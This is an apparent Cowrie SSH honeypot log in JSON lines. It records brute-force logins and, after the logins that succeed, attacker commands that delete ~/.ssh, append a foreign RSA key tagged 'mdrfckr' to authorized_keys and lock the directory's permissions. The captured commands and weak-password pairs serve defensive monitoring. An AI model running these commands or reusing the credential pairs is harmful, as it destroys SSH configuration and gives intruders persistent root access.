{"eventid":"cowrie.session.closed","duration":"35.2","message":"Connection lost after 35.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:50:54.907226Z","src_ip":"212.227.235.229","session":"d7a89a7b5299"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51800,"dst_ip":"1.2.3.4","dst_port":22,"session":"295eef0218cc","protocol":"ssh","message":"New connection: 212.227.235.229:51800 (1.2.3.4:22) [session: 295eef0218cc]","sensor":"my-vps","timestamp":"2025-09-08T21:51:13.392341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:51:13.398621Z","src_ip":"212.227.235.229","session":"295eef0218cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:51:13.647270Z","src_ip":"212.227.235.229","session":"295eef0218cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"e37f412ce0db","protocol":"ssh","message":"New connection: 212.227.235.229:64001 (1.2.3.4:22) [session: e37f412ce0db]","sensor":"my-vps","timestamp":"2025-09-08T21:51:14.663896Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:14.765913Z","src_ip":"212.227.235.229","session":"e37f412ce0db"}
{"eventid":"cowrie.login.failed","username":"audit","password":"12345","message":"login attempt [audit/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:51:15.258988Z","src_ip":"212.227.235.229","session":"295eef0218cc"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:16.512050Z","src_ip":"212.227.235.229","session":"295eef0218cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48050,"dst_ip":"1.2.3.4","dst_port":22,"session":"b89a924aafba","protocol":"ssh","message":"New connection: 212.227.235.229:48050 (1.2.3.4:22) [session: b89a924aafba]","sensor":"my-vps","timestamp":"2025-09-08T21:51:19.847725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:51:19.848565Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:51:20.018450Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.login.success","username":"root","password":"01234567","message":"login attempt [root/01234567] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:51:20.738790Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:51:21.129964Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:51:21.130630Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:51:21.131499Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:21.303343Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:51:21.660020Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:51:21.660692Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:51:21.832772Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:21.833774Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61724,"dst_ip":"1.2.3.4","dst_port":22,"session":"632beae36f77","protocol":"ssh","message":"New connection: 217.72.205.35:61724 (1.2.3.4:22) [session: 632beae36f77]","sensor":"my-vps","timestamp":"2025-09-08T21:51:22.013376Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:22.014392Z","src_ip":"217.72.205.35","session":"632beae36f77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48060,"dst_ip":"1.2.3.4","dst_port":22,"session":"4788b2cf12b0","protocol":"ssh","message":"New connection: 212.227.235.229:48060 (1.2.3.4:22) [session: 4788b2cf12b0]","sensor":"my-vps","timestamp":"2025-09-08T21:51:22.018145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:51:22.018626Z","src_ip":"212.227.235.229","session":"4788b2cf12b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:51:22.199539Z","src_ip":"212.227.235.229","session":"4788b2cf12b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:51:22.963075Z","src_ip":"212.227.235.229","session":"4788b2cf12b0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:24.145116Z","src_ip":"212.227.235.229","session":"4788b2cf12b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52380,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9789b822f20","protocol":"ssh","message":"New connection: 212.227.235.229:52380 (1.2.3.4:22) [session: e9789b822f20]","sensor":"my-vps","timestamp":"2025-09-08T21:51:24.333800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:51:24.334655Z","src_ip":"212.227.235.229","session":"e9789b822f20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:51:24.518976Z","src_ip":"212.227.235.229","session":"e9789b822f20"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:51:25.301560Z","src_ip":"212.227.235.229","session":"e9789b822f20"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:25.476524Z","src_ip":"212.227.235.229","session":"b89a924aafba"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:51:25.487439Z","src_ip":"212.227.235.229","session":"e9789b822f20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47794,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc3a07b0a72f","protocol":"ssh","message":"New connection: 212.227.235.229:47794 (1.2.3.4:22) [session: bc3a07b0a72f]","sensor":"my-vps","timestamp":"2025-09-08T21:51:29.103787Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57814,"dst_ip":"1.2.3.4","dst_port":22,"session":"db25560a630a","protocol":"ssh","message":"New connection: 212.227.235.229:57814 (1.2.3.4:22) [session: db25560a630a]","sensor":"my-vps","timestamp":"2025-09-08T21:52:14.163292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:14.267430Z","src_ip":"212.227.235.229","session":"db25560a630a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:14.470686Z","src_ip":"212.227.235.229","session":"db25560a630a"}
{"eventid":"cowrie.login.failed","username":"access","password":"password123","message":"login attempt [access/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:15.345163Z","src_ip":"212.227.235.229","session":"db25560a630a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:16.552434Z","src_ip":"212.227.235.229","session":"db25560a630a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43474,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f79daa95c36","protocol":"ssh","message":"New connection: 212.227.235.229:43474 (1.2.3.4:22) [session: 0f79daa95c36]","sensor":"my-vps","timestamp":"2025-09-08T21:52:25.893171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:25.894027Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:26.070037Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.login.success","username":"root","password":"Administrator","message":"login attempt [root/Administrator] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:52:26.774717Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:52:27.173164Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:52:27.174026Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:52:27.175061Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:27.352498Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:52:27.773098Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:52:27.774124Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:52:27.953228Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:27.954081Z","src_ip":"212.227.235.229","session":"0f79daa95c36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43484,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa482203a08b","protocol":"ssh","message":"New connection: 212.227.235.229:43484 (1.2.3.4:22) [session: fa482203a08b]","sensor":"my-vps","timestamp":"2025-09-08T21:52:28.128142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:28.128917Z","src_ip":"212.227.235.229","session":"fa482203a08b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:28.306172Z","src_ip":"212.227.235.229","session":"fa482203a08b"}
